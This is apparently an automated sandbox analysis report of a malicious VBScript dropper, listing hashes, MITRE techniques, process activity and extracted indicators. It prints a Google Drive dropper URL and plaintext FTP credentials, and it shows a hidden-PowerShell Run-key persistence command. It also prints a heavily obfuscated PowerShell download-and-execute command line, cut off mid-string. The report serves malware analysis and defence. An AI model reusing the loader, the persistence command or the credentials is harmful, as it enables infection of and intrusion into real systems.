c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e

Analysis

max time kernel
145s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs
Size

691KB
MD5

56258f68ad095965e7ef46b623d68619
SHA1

780a03a86b36e69f5169905fa52bc352b1c993a2
SHA256

c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e
SHA512

4461f4de2fb0dc61e0e0dc62347eca655e4980ad3f222453a3dbfb6533b13b6bee9ee9cbf122db508639968fdb671b42154d1460ac6e967d47b3fd5518f96a3f
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE77777777777777777777777777777777777777v:45VLpOe/

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 45 IoCs

flow	pid	Process
10	3652	powershell.exe
15	3652	powershell.exe
19	3652	powershell.exe
21	3652	powershell.exe
23	3652	powershell.exe
30	3652	powershell.exe
32	3652	powershell.exe
33	3652	powershell.exe
34	3652	powershell.exe
35	3652	powershell.exe
36	3652	powershell.exe
50	3652	powershell.exe
51	3652	powershell.exe
52	3652	powershell.exe
53	3652	powershell.exe
54	3652	powershell.exe
55	3652	powershell.exe
56	3652	powershell.exe
57	3652	powershell.exe
58	3652	powershell.exe
60	3652	powershell.exe
61	3652	powershell.exe
62	3652	powershell.exe
63	3652	powershell.exe
64	3652	powershell.exe
65	3652	powershell.exe
66	3652	powershell.exe
67	3652	powershell.exe
68	3652	powershell.exe
74	3652	powershell.exe
75	3652	powershell.exe
76	3652	powershell.exe
77	3652	powershell.exe
78	3652	powershell.exe
79	3652	powershell.exe
80	3652	powershell.exe
81	3652	powershell.exe
82	3652	powershell.exe
83	3652	powershell.exe
84	3652	powershell.exe
86	3652	powershell.exe
88	3652	powershell.exe
89	3652	powershell.exe
90	3652	powershell.exe
91	3652	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1368	powershell.exe
848	powershell.exe
1852	powershell.exe
3844	powershell.exe
3652	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_aux = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\kpibm.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3844	powershell.exe
3844	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
848	powershell.exe
1368	powershell.exe
1368	powershell.exe
848	powershell.exe
1852	powershell.exe
1852	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1788 wrote to memory of 3844	1788	WScript.exe	84
PID 1788 wrote to memory of 3844	1788	WScript.exe	84
PID 3844 wrote to memory of 3652	3844	powershell.exe	86
PID 3844 wrote to memory of 3652	3844	powershell.exe	86
PID 3652 wrote to memory of 1368	3652	powershell.exe	91
PID 3652 wrote to memory of 1368	3652	powershell.exe	91
PID 3652 wrote to memory of 848	3652	powershell.exe	92
PID 3652 wrote to memory of 848	3652	powershell.exe	92
PID 3652 wrote to memory of 4004	3652	powershell.exe	93
PID 3652 wrote to memory of 4004	3652	powershell.exe	93
PID 3652 wrote to memory of 1852	3652	powershell.exe	94
PID 3652 wrote to memory of 1852	3652	powershell.exe	94
PID 3652 wrote to memory of 5072	3652	powershell.exe	96
PID 3652 wrote to memory of 5072	3652	powershell.exe	96
PID 3652 wrote to memory of 4836	3652	powershell.exe	97
PID 3652 wrote to memory of 4836	3652	powershell.exe	97
PID 3652 wrote to memory of 1904	3652	powershell.exe	100
PID 3652 wrote to memory of 1904	3652	powershell.exe	100
PID 3652 wrote to memory of 2992	3652	powershell.exe	101
PID 3652 wrote to memory of 2992	3652	powershell.exe	101
PID 3652 wrote to memory of 1484	3652	powershell.exe	102
PID 3652 wrote to memory of 1484	3652	powershell.exe	102
PID 3652 wrote to memory of 2400	3652	powershell.exe	103
PID 3652 wrote to memory of 2400	3652	powershell.exe	103
PID 3652 wrote to memory of 4832	3652	powershell.exe	104
PID 3652 wrote to memory of 4832	3652	powershell.exe	104
PID 3652 wrote to memory of 4284	3652	powershell.exe	105
PID 3652 wrote to memory of 4284	3652	powershell.exe	105
PID 3652 wrote to memory of 4076	3652	powershell.exe	108
PID 3652 wrote to memory of 4076	3652	powershell.exe	108
PID 3652 wrote to memory of 1612	3652	powershell.exe	109
PID 3652 wrote to memory of 1612	3652	powershell.exe	109
PID 3652 wrote to memory of 1700	3652	powershell.exe	110
PID 3652 wrote to memory of 1700	3652	powershell.exe	110
PID 3652 wrote to memory of 2988	3652	powershell.exe	111
PID 3652 wrote to memory of 2988	3652	powershell.exe	111
PID 3652 wrote to memory of 3856	3652	powershell.exe	112
PID 3652 wrote to memory of 3856	3652	powershell.exe	112
PID 3652 wrote to memory of 2044	3652	powershell.exe	113
PID 3652 wrote to memory of 2044	3652	powershell.exe	113
PID 3652 wrote to memory of 2336	3652	powershell.exe	114
PID 3652 wrote to memory of 2336	3652	powershell.exe	114
PID 3652 wrote to memory of 3464	3652	powershell.exe	115
PID 3652 wrote to memory of 3464	3652	powershell.exe	115
PID 3652 wrote to memory of 3664	3652	powershell.exe	116
PID 3652 wrote to memory of 3664	3652	powershell.exe	116
PID 3652 wrote to memory of 4272	3652	powershell.exe	117
PID 3652 wrote to memory of 4272	3652	powershell.exe	117
PID 3652 wrote to memory of 4636	3652	powershell.exe	118
PID 3652 wrote to memory of 4636	3652	powershell.exe	118
PID 3652 wrote to memory of 1204	3652	powershell.exe	119
PID 3652 wrote to memory of 1204	3652	powershell.exe	119
PID 3652 wrote to memory of 4348	3652	powershell.exe	120
PID 3652 wrote to memory of 4348	3652	powershell.exe	120
PID 3652 wrote to memory of 3672	3652	powershell.exe	121
PID 3652 wrote to memory of 3672	3652	powershell.exe	121
PID 3652 wrote to memory of 336	3652	powershell.exe	122
PID 3652 wrote to memory of 336	3652	powershell.exe	122
PID 3652 wrote to memory of 2000	3652	powershell.exe	123
PID 3652 wrote to memory of 2000	3652	powershell.exe	123
PID 3652 wrote to memory of 2332	3652	powershell.exe	124
PID 3652 wrote to memory of 2332	3652	powershell.exe	124
PID 3652 wrote to memory of 2240	3652	powershell.exe	125
PID 3652 wrote to memory of 2240	3652	powershell.exe	125

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉDEШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉnШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉCШḆЉШḆЉLШḆЉШḆЉgШḆЉCcШḆЉaШḆЉB0ШḆЉHQШḆЉcШḆЉBzШḆЉDoШḆЉLwШḆЉvШḆЉHШḆЉШḆЉNwШḆЉuШḆЉHQШḆЉcgШḆЉxШḆЉC4ШḆЉbgШḆЉwШḆЉC4ШḆЉYwBkШḆЉG4ШḆЉLgB6ШḆЉGkШḆЉZwBoШḆЉHQШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉGkШḆЉdШḆЉBlШḆЉG0ШḆЉcwШḆЉvШḆЉEEШḆЉcШḆЉB1ШḆЉHEШḆЉSwBSШḆЉHcШḆЉSgШḆЉvШḆЉDgШḆЉNgBhШḆЉDШḆЉШḆЉOШḆЉBiШḆЉDMШḆЉZQШḆЉtШḆЉGYШḆЉYwШḆЉzШḆЉGIШḆЉLQШḆЉ0ШḆЉGUШḆЉMwШḆЉ2ШḆЉC0ШḆЉYQШḆЉxШḆЉDQШḆЉNgШḆЉtШḆЉGYШḆЉZQШḆЉyШḆЉDШḆЉШḆЉNgШḆЉ0ШḆЉDkШḆЉNQBlШḆЉDYШḆЉYwШḆЉ2ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉPwByШḆЉGUШḆЉcwBwШḆЉG8ШḆЉbgBzШḆЉGUШḆЉLQBjШḆЉG8ШḆЉbgB0ШḆЉGUШḆЉbgB0ШḆЉC0ШḆЉZШḆЉBpШḆЉHMШḆЉcШḆЉBvШḆЉHMШḆЉaQB0ШḆЉGkШḆЉbwBuШḆЉD0ШḆЉYQB0ШḆЉHQШḆЉYQBjШḆЉGgШḆЉbQBlШḆЉG4ШḆЉdШḆЉШḆЉlШḆЉDMШḆЉQgШḆЉrШḆЉGYШḆЉaQBsШḆЉGUШḆЉbgBhШḆЉG0ШḆЉZQШḆЉlШḆЉDMШḆЉRШḆЉШḆЉlШḆЉDIШḆЉMgШḆЉwШḆЉDcШḆЉLgШḆЉwШḆЉDgШḆЉLgШḆЉyШḆЉDШḆЉШḆЉMgШḆЉ0ШḆЉC4ШḆЉdШḆЉB4ШḆЉHQШḆЉJQШḆЉyШḆЉDIШḆЉJQШḆЉzШḆЉEIШḆЉKwBmШḆЉGkШḆЉbШḆЉBlШḆЉG4ШḆЉYQBtШḆЉGUШḆЉJQШḆЉyШḆЉEEШḆЉJQШḆЉzШḆЉEQШḆЉVQBUШḆЉEYШḆЉLQШḆЉ4ШḆЉCUШḆЉMgШḆЉ3ШḆЉCUШḆЉMgШḆЉ3ШḆЉDШḆЉШḆЉNwШḆЉuШḆЉDШḆЉШḆЉOШḆЉШḆЉuШḆЉDIШḆЉMШḆЉШḆЉyШḆЉDQШḆЉLgB0ШḆЉHgШḆЉdШḆЉШḆЉmШḆЉHMШḆЉbwB1ШḆЉHIШḆЉYwBlШḆЉD0ШḆЉZШḆЉBvШḆЉHcШḆЉbgBsШḆЉG8ШḆЉYQBkШḆЉCYШḆЉdgШḆЉ9ШḆЉCUШḆЉMgШḆЉyШḆЉGEШḆЉNgBhШḆЉDQШḆЉMQШḆЉ3ШḆЉDUШḆЉNgBmШḆЉDgШḆЉOШḆЉBiШḆЉDQШḆЉZQШḆЉxШḆЉDUШḆЉNQBmШḆЉGQШḆЉOШḆЉШḆЉzШḆЉDШḆЉШḆЉMШḆЉШḆЉwШḆЉDIШḆЉNgBhШḆЉGMШḆЉYgШḆЉzШḆЉDEШḆЉMwШḆЉlШḆЉDIШḆЉMgШḆЉnШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉFsШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉbШḆЉBsШḆЉHUШḆЉbgШḆЉkШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGsШḆЉbwB2ШḆЉG4ШḆЉSQШḆЉuШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEkШḆЉVgBGШḆЉHIШḆЉcШḆЉШḆЉnШḆЉCШḆЉШḆЉKШḆЉBkШḆЉG8ШḆЉaШḆЉB0ШḆЉGUШḆЉTQB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉJwШḆЉxШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉuШḆЉDMШḆЉeQByШḆЉGEШḆЉcgBiШḆЉGkШḆЉTШḆЉBzШḆЉHMШḆЉYQBsШḆЉEMШḆЉJwШḆЉoШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉdШḆЉBlШḆЉEcШḆЉLgШḆЉpШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGQШḆЉYQBvШḆЉEwШḆЉLgBuШḆЉGkШḆЉYQBtШḆЉG8ШḆЉRШḆЉB0ШḆЉG4ШḆЉZQByШḆЉHIШḆЉdQBDШḆЉDoШḆЉOgBdШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBBШḆЉCcШḆЉIШḆЉШḆЉsШḆЉCШḆЉШḆЉJwCTIToШḆЉkyEnШḆЉCШḆЉШḆЉKШḆЉBlШḆЉGMШḆЉYQBsШḆЉHШḆЉШḆЉZQBSШḆЉC4ШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉDQШḆЉNgBlШḆЉHMШḆЉYQBCШḆЉG0ШḆЉbwByШḆЉEYШḆЉOgШḆЉ6ШḆЉF0ШḆЉdШḆЉByШḆЉGUШḆЉdgBuШḆЉG8ШḆЉQwШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉeШḆЉBtШḆЉHoШḆЉWШḆЉB4ШḆЉCQШḆЉIШḆЉBdШḆЉF0ШḆЉWwBlШḆЉHQШḆЉeQBCШḆЉFsШḆЉOwШḆЉnШḆЉCUШḆЉSQBoШḆЉHEШḆЉUgBYШḆЉCUШḆЉJwШḆЉgШḆЉD0ШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉZШḆЉBhШḆЉG8ШḆЉbШḆЉBuШḆЉHcШḆЉbwBEШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbgBaШḆЉHcШḆЉQQBHШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉoШḆЉGUШḆЉcwBvШḆЉHШḆЉШḆЉcwBpШḆЉGQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHQШḆЉeШḆЉB0ШḆЉC4ШḆЉMQШḆЉwШḆЉEwШḆЉTШḆЉBEШḆЉC8ШḆЉMQШḆЉwШḆЉC8ШḆЉcgBlШḆЉHQШḆЉcШḆЉB5ШḆЉHIШḆЉYwBwШḆЉFUШḆЉLwByШḆЉGIШḆЉLgBtШḆЉG8ШḆЉYwШḆЉuШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉLgBwШḆЉHQШḆЉZgBШḆЉШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉvШḆЉC8ШḆЉOgBwШḆЉHQШḆЉZgШḆЉnШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBuШḆЉFoШḆЉdwBBШḆЉEcШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwBШḆЉШḆЉEШḆЉШḆЉcШḆЉBKШḆЉDgШḆЉNwШḆЉ1ШḆЉDEШḆЉMgBvШḆЉHIШḆЉcШḆЉByШḆЉGUШḆЉcШḆЉBvШḆЉGwШḆЉZQB2ШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCwШḆЉJwШḆЉxШḆЉHQШḆЉYQByШḆЉGIШḆЉdgBrШḆЉGMШḆЉcwBlШḆЉGQШḆЉJwШḆЉoШḆЉGwШḆЉYQBpШḆЉHQШḆЉbgBlШḆЉGQШḆЉZQByШḆЉEMШḆЉawByШḆЉG8ШḆЉdwB0ШḆЉGUШḆЉTgШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉbwШḆЉtШḆЉHcШḆЉZQBuШḆЉCШḆЉШḆЉPQШḆЉgШḆЉHMШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉG4ШḆЉWgB3ШḆЉEEШḆЉRwШḆЉkШḆЉDsШḆЉMgШḆЉxШḆЉHMШḆЉbШḆЉBUШḆЉDoШḆЉOgBdШḆЉGUШḆЉcШḆЉB5ШḆЉFQШḆЉbШḆЉBvШḆЉGMШḆЉbwB0ШḆЉG8ШḆЉcgBQШḆЉHkШḆЉdШḆЉBpШḆЉHIШḆЉdQBjШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉOwB9ШḆЉGUШḆЉdQByШḆЉHQШḆЉJШḆЉB7ШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGsШḆЉYwBhШḆЉGIШḆЉbШḆЉBsШḆЉGEШḆЉQwBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉZШḆЉBpШḆЉGwШḆЉYQBWШḆЉGUШḆЉdШḆЉBhШḆЉGMШḆЉaQBmШḆЉGkШḆЉdШḆЉByШḆЉGUШḆЉQwByШḆЉGUШḆЉdgByШḆЉGUШḆЉUwШḆЉ6ШḆЉDoШḆЉXQByШḆЉGUШḆЉZwBhШḆЉG4ШḆЉYQBNШḆЉHQШḆЉbgBpШḆЉG8ШḆЉUШḆЉBlШḆЉGMШḆЉaQB2ШḆЉHIШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉIШḆЉBmШḆЉC8ШḆЉIШḆЉШḆЉwШḆЉCШḆЉШḆЉdШḆЉШḆЉvШḆЉCШḆЉШḆЉcgШḆЉvШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBuШḆЉHcШḆЉbwBkШḆЉHQШḆЉdQBoШḆЉHMШḆЉIШḆЉШḆЉ7ШḆЉCcШḆЉMШḆЉШḆЉ4ШḆЉDEШḆЉIШḆЉBwШḆЉGUШḆЉZQBsШḆЉHMШḆЉJwШḆЉgШḆЉGQШḆЉbgBhШḆЉG0ШḆЉbQBvШḆЉGMШḆЉLQШḆЉgШḆЉGUШḆЉeШḆЉBlШḆЉC4ШḆЉbШḆЉBsШḆЉGUШḆЉaШḆЉBzШḆЉHIШḆЉZQB3ШḆЉG8ШḆЉcШḆЉШḆЉ7ШḆЉCШḆЉШḆЉZQBjШḆЉHIШḆЉbwBmШḆЉC0ШḆЉIШḆЉШḆЉpШḆЉCШḆЉШḆЉJwBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwBtШḆЉGEШḆЉcgBnШḆЉG8ШḆЉcgBQШḆЉFwШḆЉdQBuШḆЉGUШḆЉTQШḆЉgШḆЉHQШḆЉcgBhШḆЉHQШḆЉUwBcШḆЉHMШḆЉdwBvШḆЉGQШḆЉbgBpШḆЉFcШḆЉXШḆЉB0ШḆЉGYШḆЉbwBzШḆЉG8ШḆЉcgBjШḆЉGkШḆЉTQBcШḆЉGcШḆЉbgBpШḆЉG0ШḆЉYQBvШḆЉFIШḆЉXШḆЉBhШḆЉHQШḆЉYQBEШḆЉHШḆЉШḆЉcШḆЉBBШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉgШḆЉCgШḆЉIШḆЉBuШḆЉG8ШḆЉaQB0ШḆЉGEШḆЉbgBpШḆЉHQШḆЉcwBlШḆЉEQШḆЉLQШḆЉgШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉbQBlШḆЉHQШḆЉSQШḆЉtШḆЉHkШḆЉcШḆЉBvШḆЉEMШḆЉIШḆЉШḆЉ7ШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBzШḆЉGUШḆЉcgBvШḆЉG4ШḆЉLwШḆЉgШḆЉHQШḆЉZQBpШḆЉHUШḆЉcQШḆЉvШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBhШḆЉHMШḆЉdQB3ШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉCШḆЉШḆЉOwШḆЉpШḆЉCcШḆЉdQBzШḆЉG0ШḆЉLgBuШḆЉGkШḆЉdwBwШḆЉFUШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉGEШḆЉdШḆЉBzШḆЉGEШḆЉcШḆЉШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZQBsШḆЉGkШḆЉZgШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉGUШḆЉbQBhШḆЉE4ШḆЉcgBlШḆЉHMШḆЉVQШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉG4ШḆЉZQBtШḆЉG4ШḆЉbwByШḆЉGkШḆЉdgBuШḆЉEUШḆЉWwШḆЉgШḆЉCsШḆЉIШḆЉШḆЉnШḆЉFwШḆЉcwByШḆЉGUШḆЉcwBVШḆЉFwШḆЉOgBDШḆЉCcШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBwШḆЉHUШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉGQШḆЉbШḆЉBvШḆЉEYШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉYQB0ШḆЉHMШḆЉYQBwШḆЉCQШḆЉIШḆЉШḆЉsШḆЉEIШḆЉSwBMШḆЉFIШḆЉVQШḆЉkШḆЉCgШḆЉZQBsШḆЉGkШḆЉRgBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBvШḆЉHMШḆЉVQBIШḆЉHUШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉbwBzШḆЉFUШḆЉSШḆЉB1ШḆЉCQШḆЉOwB9ШḆЉDsШḆЉIШḆЉШḆЉpШḆЉCcШḆЉcgBnШḆЉDgШḆЉRШḆЉШḆЉ3ШḆЉG8ШḆЉUgBzШḆЉGYШḆЉVgBjШḆЉHIШḆЉMgBuШḆЉEEШḆЉaШḆЉBmШḆЉGgШḆЉVgШḆЉ2ШḆЉEQШḆЉQwB4ШḆЉFIШḆЉcQBuШḆЉHEШḆЉagШḆЉ1ШḆЉGoШḆЉcgBiШḆЉDEШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBQШḆЉHШḆЉШḆЉVgBpШḆЉHMШḆЉJШḆЉШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉHsШḆЉIШḆЉBlШḆЉHMШḆЉbШḆЉBlШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwB4ШḆЉDQШḆЉZgBoШḆЉFoШḆЉTQB3ШḆЉE4ШḆЉNwBVШḆЉGUШḆЉXwШḆЉwШḆЉF8ШḆЉNQBfШḆЉGkШḆ